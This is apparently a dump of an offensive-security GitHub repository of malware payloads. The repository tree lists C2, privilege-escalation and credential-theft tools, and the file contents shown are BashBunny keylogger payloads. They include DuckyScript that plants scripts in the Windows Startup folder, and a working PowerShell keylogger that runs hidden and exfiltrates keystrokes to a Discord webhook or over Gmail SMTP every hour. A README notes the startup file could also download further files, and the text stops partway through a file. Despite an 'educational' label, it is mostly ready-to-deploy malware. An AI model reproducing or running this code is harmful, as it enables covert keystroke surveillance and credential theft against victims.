├── .gitignore ├── README.md ├── bashbunny ├── BunnyKeyhook │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── duckyscript.txt │ ├── l.ps1 │ ├── p.ps1 │ ├── payload.txt │ └── uninstaller.cmd ├── BunnyLogger │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── duckyscript.txt │ ├── l.ps1 │ ├── p.ps1 │ └── payload.txt ├── OnlyBUGS │ ├── README.md │ ├── duckyscript.txt │ └── payload.txt ├── geofencing │ └── payload.txt ├── helloworld │ └── payload.txt ├── remote-trigger │ └── payload.txt ├── webcredential-gui │ ├── P.cfg │ ├── P.exe │ ├── README.md │ ├── WebBrowserPassView.chm │ ├── ducky-script.txt │ └── payload.txt └── wifi-credentials │ ├── README.md │ ├── ducky-script.txt │ └── payload.txt ├── discord ├── bot.nim ├── bot.py ├── exfiltration-screen.ps1 ├── exfiltration-wifi.ps1 ├── get-webhook.cmd ├── get-webhook.ps1 ├── get-webhook.sh ├── send-file.cmd ├── send-file.ps1 ├── send-file.sh ├── send-message.cmd ├── send-message.ps1 └── send-message.sh ├── privesc ├── create-admin.ps1 ├── getadmin.cmd └── uac-prompt.cmd ├── reports ├── README.md └── sillyputty │ ├── README.md │ ├── SillyPutty-MalwareAnalysisReport.pdf │ ├── putty.7z │ └── sillyputty.yara ├── rubberducky ├── DucKey-Logger │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── l.ps1 │ ├── p.ps1 │ └── payload.txt ├── DucKeyhook │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── l.ps1 │ ├── p.ps1 │ ├── payload.txt │ └── uninstaller.cmd ├── DuckMinistrator │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── inject.bin │ └── payload.txt ├── OnlyDuck │ ├── README.md │ └── onlyduck.txt ├── duckfi │ ├── README.md │ ├── c.cmd │ └── payload.txt ├── ducky-flasher │ ├── Firmware │ │ ├── USB_v2.hex │ │ ├── c_duck_v2.hex │ │ ├── c_duck_v2_S001.hex │ │ ├── c_duck_v2_S002.hex │ │ ├── duck_v2.hex │ │ └── m_duck_v2.hex │ ├── README.md │ ├── ducky-flasher │ ├── readme.txt │ ├── setup.py │ └── uninstall.py ├── duckylan-smtp │ ├── LICENSE │ ├── README.md │ ├── p.ps1 │ └── payload.txt ├── encoder │ ├── README.md │ ├── duckencoder.py │ └── resources │ │ ├── be.properties │ │ ├── br.properties │ │ ├── ca.properties │ │ ├── ch.properties │ │ ├── cm.properties │ │ ├── cs.properties │ │ ├── de.properties │ │ ├── dk.properties │ │ ├── es.properties │ │ ├── fi.properties │ │ ├── fr.properties │ │ ├── gb.properties │ │ ├── hr.properties │ │ ├── it.properties │ │ ├── keyboard.properties │ │ ├── no.properties │ │ ├── pt.properties │ │ ├── ru.properties │ │ ├── si.properties │ │ ├── sv.properties │ │ ├── tr.properties │ │ └── us.properties ├── helloworld │ ├── inject.bin │ └── payload.txt ├── twinduck-wifipass │ ├── inject.bin │ └── payload.txt └── webattack │ ├── inject.bin │ └── payload.txt ├── ssh ├── disable-ssh-persistence.ps1 ├── enable-ssh-persistence.ps1 └── remote-code-exec.sh ├── tcp ├── Makefile ├── agent ├── agent.c ├── c2.py └── poc.txt └── videos ├── alternative-data-streams ├── README.md ├── ads.png ├── grad.mp4 ├── main.c ├── main.exe └── payload.txt ├── developing-trojans-with-shellcode ├── README.md ├── ZoomIt.exe ├── calc.bin ├── main.c ├── main.exe └── zoomit.log ├── embedding-shellcode ├── README.md ├── embed-data │ ├── a.exe │ ├── embed-data.cpp │ ├── embed-data.exe │ ├── embed-data.ilk │ ├── embed-data.obj │ ├── embed-data.pdb │ └── vc140.pdb ├── embed-rsrc │ ├── embed-rsrc.cpp │ ├── embed-rsrc.exe │ ├── embed-rsrc.obj │ ├── notepad32.ico │ ├── rsrc.o │ ├── rsrc.rc │ └── rsrc.res ├── embed-text │ ├── embed-text.cpp │ ├── embed-text.exe │ ├── embed-text.ilk │ ├── embed-text.obj │ ├── embed-text.pdb │ └── vc140.pdb └── notepad32.c ├── fun-with-dlls ├── README.md ├── cosmo.dll ├── dll-loader.cpp ├── dll-loader.exe ├── dll-proxy.c ├── dll.c ├── proxy.dll ├── shell.dll └── shell.nim ├── function-obfuscation ├── fob │ ├── function-obfuscation-cgpa.cpp │ ├── function-obfuscation-cgpa.obj │ ├── function-obfuscation-full.cpp │ ├── function-obfuscation-full.obj │ ├── function-obfuscation-full2.cpp │ ├── function-obfuscation.cpp │ ├── function-obfuscation.exe │ ├── function-obfuscation.obj │ ├── notepad.bin │ ├── vc140.pdb │ └── xor-encrypt.py └── function-obfuscation.cpp ├── keystroke-injection-vbs ├── README.md ├── injection-backspace.vbs ├── injection-disco.vbs └── injection-string.vbs ├── malware-roadmap ├── README.md ├── css │ ├── layout.css │ ├── mattropolis.css │ └── vs2015.css ├── dist │ ├── fontawesome │ │ └── all.min.js │ ├── reset.css │ ├── reveal.css │ ├── reveal.esm.js │ ├── reveal.esm.js.map │ ├── reveal.js │ ├── reveal.js.map │ └── theme │ │ ├── beige.css │ │ ├── black.css │ │ ├── blood.css │ │ ├── consult.css │ │ ├── fonts │ │ ├── lato │ │ │ └── lato.css │ │ ├── league-gothic │ │ │ └── league-gothic.css │ │ └── source-sans-pro │ │ │ ├── LICENSE │ │ │ ├── source-sans-pro-italic.eot │ │ │ ├── source-sans-pro-italic.ttf │ │ │ ├── source-sans-pro-italic.woff │ │ │ ├── source-sans-pro-regular.eot │ │ │ ├── source-sans-pro-regular.ttf │ │ │ ├── source-sans-pro-regular.woff │ │ │ ├── source-sans-pro-semibold.eot │ │ │ ├── source-sans-pro-semibold.ttf │ │ │ ├── source-sans-pro-semibold.woff │ │ │ ├── source-sans-pro-semibolditalic.eot │ │ │ ├── source-sans-pro-semibolditalic.ttf │ │ │ ├── source-sans-pro-semibolditalic.woff │ │ │ └── source-sans-pro.css │ │ ├── league.css │ │ ├── mattropolis.css │ │ ├── moon.css │ │ ├── night.css │ │ ├── serif.css │ │ ├── simple.css │ │ ├── sky.css │ │ ├── solarized.css │ │ └── white.css ├── index.html ├── plugin │ ├── chalkboard │ │ ├── README.md │ │ ├── _style.css │ │ ├── img │ │ │ ├── blackboard.png │ │ │ ├── boardmarker-black.png │ │ │ ├── boardmarker-blue.png │ │ │ ├── boardmarker-green.png │ │ │ ├── boardmarker-orange.png │ │ │ ├── boardmarker-purple.png │ │ │ ├── boardmarker-red.png │ │ │ ├── boardmarker-yellow.png │ │ │ ├── chalk-blue.png │ │ │ ├── chalk-green.png │ │ │ ├── chalk-orange.png │ │ │ ├── chalk-purple.png │ │ │ ├── chalk-red.png │ │ │ ├── chalk-white.png │ │ │ ├── chalk-yellow.png │ │ │ ├── sponge.png │ │ │ └── whiteboard.png │ │ ├── plugin (copy).js │ │ ├── plugin.js │ │ └── style.css │ ├── chart │ │ ├── README.md │ │ ├── chart.min.js │ │ └── plugin.js │ ├── customcontrols │ │ ├── README.md │ │ ├── plugin.js │ │ └── style.css │ ├── elapsed-time-bar │ │ └── elapsed-time-bar.js │ ├── highlight │ │ ├── highlight.esm.js │ │ ├── highlight.js │ │ ├── monokai.css │ │ ├── plugin.js │ │ └── zenburn.css │ ├── markdown │ │ ├── markdown.esm.js │ │ ├── markdown.js │ │ └── plugin.js │ ├── math │ │ ├── katex.js │ │ ├── math.esm.js │ │ ├── math.js │ │ ├── mathjax │ │ │ ├── a11y │ │ │ │ ├── assistive-mml.js │ │ │ │ ├── complexity.js │ │ │ │ ├── explorer.js │ │ │ │ └── semantic-enrich.js │ │ │ ├── adaptors │ │ │ │ └── liteDOM.js │ │ │ ├── core.js │ │ │ ├── input │ │ │ │ ├── asciimath.js │ │ │ │ ├── mml.js │ │ │ │ ├── mml │ │ │ │ │ ├── entities.js │ │ │ │ │ └── extensions │ │ │ │ │ │ ├── mml3.js │ │ │ │ │ │ └── mml3.sef.json │ │ │ │ ├── tex-base.js │ │ │ │ ├── tex-full.js │ │ │ │ ├── tex.js │ │ │ │ └── tex │ │ │ │ │ └── extensions │ │ │ │ │ ├── action.js │ │ │ │ │ ├── all-packages.js │ │ │ │ │ ├── ams.js │ │ │ │ │ ├── amscd.js │ │ │ │ │ ├── autoload.js │ │ │ │ │ ├── bbox.js │ │ │ │ │ ├── boldsymbol.js │ │ │ │ │ ├── braket.js │ │ │ │ │ ├── bussproofs.js │ │ │ │ │ ├── cancel.js │ │ │ │ │ ├── centernot.js │ │ │ │ │ ├── color.js │ │ │ │ │ ├── colortbl.js │ │ │ │ │ ├── colorv2.js │ │ │ │ │ ├── configmacros.js │ │ │ │ │ ├── enclose.js │ │ │ │ │ ├── extpfeil.js │ │ │ │ │ ├── gensymb.js │ │ │ │ │ ├── html.js │ │ │ │ │ ├── mathtools.js │ │ │ │ │ ├── mhchem.js │ │ │ │ │ ├── newcommand.js │ │ │ │ │ ├── noerrors.js │ │ │ │ │ ├── noundefined.js │ │ │ │ │ ├── physics.js │ │ │ │ │ ├── require.js │ │ │ │ │ ├── setoptions.js │ │ │ │ │ ├── tagformat.js │ │ │ │ │ ├── textcomp.js │ │ │ │ │ ├── textmacros.js │ │ │ │ │ ├── unicode.js │ │ │ │ │ ├── upgreek.js │ │ │ │ │ └── verb.js │ │ │ ├── latest.js │ │ │ ├── loader.js │ │ │ ├── mml-chtml.js │ │ │ ├── mml-svg.js │ │ │ ├── node-main.js │ │ │ ├── output │ │ │ │ ├── chtml.js │ │ │ │ ├── chtml │ │ │ │ │ └── fonts │ │ │ │ │ │ ├── tex.js │ │ │ │ │ │ └── woff-v2 │ │ │ │ │ │ ├── MathJax_AMS-Regular.woff │ │ │ │ │ │ ├── MathJax_Calligraphic-Bold.woff │ │ │ │ │ │ ├── MathJax_Calligraphic-Regular.woff │ │ │ │ │ │ ├── MathJax_Fraktur-Bold.woff │ │ │ │ │ │ ├── MathJax_Fraktur-Regular.woff │ │ │ │ │ │ ├── MathJax_Main-Bold.woff │ │ │ │ │ │ ├── MathJax_Main-Italic.woff │ │ │ │ │ │ ├── MathJax_Main-Regular.woff │ │ │ │ │ │ ├── MathJax_Math-BoldItalic.woff │ │ │ │ │ │ ├── MathJax_Math-Italic.woff │ │ │ │ │ │ ├── MathJax_Math-Regular.woff │ │ │ │ │ │ ├── MathJax_SansSerif-Bold.woff │ │ │ │ │ │ ├── MathJax_SansSerif-Italic.woff │ │ │ │ │ │ ├── MathJax_SansSerif-Regular.woff │ │ │ │ │ │ ├── MathJax_Script-Regular.woff │ │ │ │ │ │ ├── MathJax_Size1-Regular.woff │ │ │ │ │ │ ├── MathJax_Size2-Regular.woff │ │ │ │ │ │ ├── MathJax_Size3-Regular.woff │ │ │ │ │ │ ├── MathJax_Size4-Regular.woff │ │ │ │ │ │ ├── MathJax_Typewriter-Regular.woff │ │ │ │ │ │ ├── MathJax_Vector-Bold.woff │ │ │ │ │ │ ├── MathJax_Vector-Regular.woff │ │ │ │ │ │ └── MathJax_Zero.woff │ │ │ │ ├── svg.js │ │ │ │ └── svg │ │ │ │ │ └── fonts │ │ │ │ │ └── tex.js │ │ │ ├── sre │ │ │ │ ├── mathmaps │ │ │ │ │ ├── de.js │ │ │ │ │ ├── en.js │ │ │ │ │ ├── es.js │ │ │ │ │ ├── fr.js │ │ │ │ │ ├── hi.js │ │ │ │ │ ├── it.js │ │ │ │ │ └── nemeth.js │ │ │ │ ├── sre-node.js │ │ │ │ └── sre_browser.js │ │ │ ├── startup.js │ │ │ ├── tex-chtml-full.js │ │ │ ├── tex-chtml.js │ │ │ ├── tex-mml-chtml.js │ │ │ ├── tex-mml-svg.js │ │ │ ├── tex-svg-full.js │ │ │ ├── tex-svg.js │ │ │ └── ui │ │ │ │ ├── lazy.js │ │ │ │ ├── menu.js │ │ │ │ └── safe.js │ │ ├── mathjax2.js │ │ ├── mathjax3.js │ │ └── plugin.js │ ├── menu │ │ ├── CONTRIBUTING.md │ │ ├── LICENSE │ │ ├── README.md │ │ ├── bower.json │ │ ├── gulpfile.js │ │ ├── menu.css │ │ ├── menu.esm.js │ │ ├── menu.js │ │ ├── package.json │ │ └── plugin.js │ ├── mermaid │ │ ├── mermaid.esm.js │ │ ├── mermaid.js │ │ └── plugin.js │ ├── notes │ │ ├── notes.esm.js │ │ ├── notes.js │ │ ├── plugin.js │ │ └── speaker-view.html │ ├── reveal-pointer │ │ ├── pointer.css │ │ └── pointer.js │ ├── search │ │ ├── plugin.js │ │ ├── search.esm.js │ │ └── search.js │ └── zoom │ │ ├── plugin.js │ │ ├── zoom.esm.js │ │ └── zoom.js └── slides.pdf ├── pe-deepdive ├── README.md ├── cosmo.dll ├── example-dll.c ├── example-exe.cpp └── example-exe.exe ├── port-knocking ├── README.md └── port-knocker.c ├── qemu-malware-lab ├── README.md └── personalize-windows.reg ├── tools-for-malware-analysis └── README.md ├── tools-for-malware-development ├── README.md └── ninite.exe └── wix-0-day ├── README.md └── wix.py /.gitignore: -------------------------------------------------------------------------------- 1 | dns 2 | http 3 | smtp 4 | socks 5 | <<<<<<< HEAD 6 | ssh 7 | tcp 8 | ======= 9 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 10 | udp 11 | web-sockets 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Malware Development and Analysis [DNA] 2 | This repository holds different snippets of code that can be used for offensive development as well as malware development and analysis. be responsible, as this is for educational purposes and is to serve as a resource for offensive developers and fans of the channel :) 3 | 4 | ## Development: 5 | - [Malware Development Videos](https://www.youtube.com/playlist?list=PL_dk67mLCSFHa5jDNvEuXuoafMHmTjn32) 6 | - [Malware Research](https://cosmodiumcs.com/blog) 7 | 8 | ## Analysis: 9 | - [Malware Analysis Videos](https://www.youtube.com/playlist?list=PL_dk67mLCSFGSkl3IiKH9H34VoeQDThFf) 10 | - [Malware Analysis Reports](https://www.cosmodiumcs.com/library) 11 | 12 | happy hacking - CosmodiumCS Development Team 13 | 14 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\p.ps1" 3 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\l.ps1" 4 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/duckyscript.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 | 13 | REM STAGE 2 14 | REM move files to appropiate directories 15 | REM change 'BashBunny' to the name of your bash bunny 16 | REM change 'switch1' to switch position that stores the paylaod 17 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 18 | ENTER 19 | DELAY 200 20 | 21 | REM STAGE 3 22 | REM run keylogger 23 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 24 | 25 | REM STAGE 4 26 | REM deploy 27 | ENTER 28 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | for(;;) { 4 | try { 5 | $proc = Get-Content "$env:temp/DdBPKCytRe" 6 | Stop-process -id $proc -Force 7 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 8 | } 9 | catch { 10 | 11 | } 12 | 13 | # change number of seconds for different delays 14 | Start-Sleep 60 15 | } 16 | 17 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # webhook, change "WEBHOOK" to your discord webhook 5 | $webhook = "WEBHOOK" 6 | 7 | # write pid 8 | $PID > "$env:temp/DdBPKCytRe" 9 | 10 | # keylogger 11 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 12 | 13 | # webhook process 14 | $logs = Get-Content "$logFile" | Out-String 15 | $Body = @{ 16 | 'username' = $env:UserName 17 | 'content' = $logs 18 | } 19 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 20 | 21 | # generate log file 22 | $generateLog = New-Item -Path $logFile -ItemType File -Force 23 | 24 | # API signatures 25 | $APIsignatures = @' 26 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 27 | public static extern short GetAsyncKeyState(int virtualKeyCode); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int GetKeyboardState(byte[] keystate); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int MapVirtualKey(uint uCode, int uMapType); 32 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 33 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 34 | '@ 35 | 36 | # set up API 37 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 38 | 39 | # attempt to log keystrokes 40 | try { 41 | while ($true) { 42 | Start-Sleep -Milliseconds 40 43 | 44 | for ($ascii = 9; $ascii -le 254; $ascii++) { 45 | 46 | # use API to get key state 47 | $keystate = $API::GetAsyncKeyState($ascii) 48 | 49 | # use API to detect keystroke 50 | if ($keystate -eq -32767) { 51 | $null = [console]::CapsLock 52 | 53 | # map virtual key 54 | $mapKey = $API::MapVirtualKey($ascii, 3) 55 | 56 | # create a stringbuilder 57 | $keyboardState = New-Object Byte[] 256 58 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 59 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 60 | 61 | # translate virtual key 62 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 63 | # add logged key to file 64 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 65 | } 66 | } 67 | } 68 | } 69 | } 70 | 71 | # send logs if code fails 72 | finally { 73 | # send logs via webhook 74 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 75 | } 76 | } 77 | 78 | # run keylogger 79 | KeyLogger -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: BunnyKeyhook 2 | # Description: Powershell Keylogger w/ Discord 3 | # Author: Blue Cosmo 4 | # Category: exfiltration 5 | # Target: Windows 10 6 | # Attackmodes: HID, STORAGE 7 | 8 | # setup payload 9 | LED SETUP 10 | ATTACKMODE HID STORAGE 11 | GET SWITCH_POSITION 12 | 13 | # execute duckyscript 14 | LED STAGE1 15 | QUACK ${SWITCH_POSITION}/duckyscript.txt 16 | 17 | LED FINISH -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/uninstaller.cmd: -------------------------------------------------------------------------------- 1 | cd C:/Users/%USERNAME%/AppData/Roaming/Microsoft/Windows && cd "Start Menu" && cd Programs/Startup 2 | del c.cmd 3 | cd %TEMP% 4 | del l.ps1 5 | del p.ps1 6 | del DdBPKCytRe 7 | del %USERNAME%.log 8 | taskkill /im powershell.exe /f 9 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/README.md: -------------------------------------------------------------------------------- 1 | # Bunny Logger 2 | > Chris Taylor [Blue Cosmo] | 08/24/21 3 | --- 4 | 5 | ``` 6 | __________ .____ 7 | \______ \__ __ ____ ____ ___.__.| | ____ ____ ____ ___________ 8 | | | _/ | \/ \ / < | || | / _ \ / ___\ / ___\_/ __ \_ __ \ 9 | | | \ | / | \ | \___ || |__( <_> ) /_/ > /_/ > ___/| | \/ 10 | |______ /____/|___| /___| / ____||_______ \____/\___ /\___ / \___ >__| 11 | \/ \/ \/\/ \/ /_____//_____/ \/ 12 | ``` 13 | 14 | ## Overview: 15 | ``` 16 | BunnyLogger is a BashBunny payload that uses PowerShell to log keystrokes 17 | ``` 18 | - moves *c.cmd* file to windows startup directory 19 | - *c.cmd* will secretly run *p.ps1* 20 | - *p.ps1* will log keystrokes 21 | - *l.ps1* will email the logs every startup and every hour [via SMTP] 22 | - sends logs hourly, regardless of system time 23 | 24 | ## Resources: 25 | - [YouTube Video](https://www.youtube.com/watch?v=z8KD9zU50xc) 26 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 27 | - [Website](https://cosmodiumcs.com) 28 | 29 | ## Requirements: 30 | - Gmail account 31 | - i suggest making a separate Gmail account for this payload 32 | - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 33 | - Windows 10 Target 34 | 35 | ## Download: 36 | ```bash 37 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/BunnyLogger 38 | ``` 39 | 40 | ## Instructions: 41 | Set-Up/Installation 42 | 1. change Gmail credentials in *p.ps1* 43 | ```powershell 44 | # gmail credentials 45 | $email = "example@gmail.com" 46 | $password = "password" 47 | ``` 48 | 2. in line 7 of *duckyscript.txt*, change 'switch1' to whatever switch you use 49 | 3. in line 7 of *duckyscript.txt*, change 'BashBunny' to the name of your BashBunny 50 | ```powershell 51 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 52 | ``` 53 | ## Extraneous: 54 | The *c.cmd* attack opportunity 55 | ``` 56 | the c.cmd file runs every startup. 57 | this means an attacker could place a 58 | 'wget' or 'Invoke-WebRequest' and have a file 59 | be downloaded from anywhere on the internet onto the computer. 60 | the file would then save in the startup directory, 61 | allowing it to run every startup 62 | ``` 63 | --- 64 | - hope you enjoy the payload!! 65 | - please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :) 66 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 3 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/l.ps1" 4 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/duckyscript.txt: -------------------------------------------------------------------------------- 1 | REM STAGE3 2 | REM allow time for powershell to open 3 | DELAY 300 4 | 5 | REM STAGE4 6 | REM cd into BashBunny, labled 'BashBunny', and move files to appropiate directories 7 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 8 | ENTER 9 | DELAY 200 10 | 11 | REM STAGE5 12 | REM run keylogger 13 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 14 | ENTER 15 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | 4 | # times logs will be sent [keep in military time] 5 | $logTimes = @( 6 | '00:00:00', 7 | '01:00:00', 8 | '02:00:00', 9 | '03:00:00', 10 | '04:00:00', 11 | '05:00:00', 12 | '06:00:00', 13 | '07:00:00', 14 | '08:00:00', 15 | '09:00:00', 16 | '10:00:00', 17 | '11:00:00', 18 | '12:00:00', 19 | '13:00:00', 20 | '14:00:00', 21 | '15:00:00', 22 | '16:00:00', 23 | '17:00:00', 24 | '18:00:00', 25 | '19:00:00', 26 | '20:00:00', 27 | '21:00:00', 28 | '22:00:00', 29 | '23:00:00' 30 | ) 31 | 32 | # sort the times in chronological order 33 | $logTimes = $logTimes | Sort-Object 34 | 35 | # ensure keylogger runs every day 36 | while ($true) { 37 | 38 | # run keylogger for each trigger time 39 | foreach ($t in $logTimes) 40 | { 41 | # checks if time passed already 42 | if((Get-Date) -lt (Get-Date -Date $t)) 43 | { 44 | # sleeps until next time is reached 45 | while ((Get-Date -Date $t) -gt (Get-Date)) 46 | { 47 | # sleeps 48 | (Get-Date -Date $t) - (Get-Date) | Start-Sleep 49 | } 50 | 51 | # runs keylogger 52 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # keylogger 9 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 10 | 11 | # email process 12 | $logs = Get-Content "$logFile" 13 | $subject = "$env:UserName logs" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $logs); 18 | 19 | # generate log file 20 | $generateLog = New-Item -Path $logFile -ItemType File -Force 21 | 22 | # API signatures 23 | $APIsignatures = @' 24 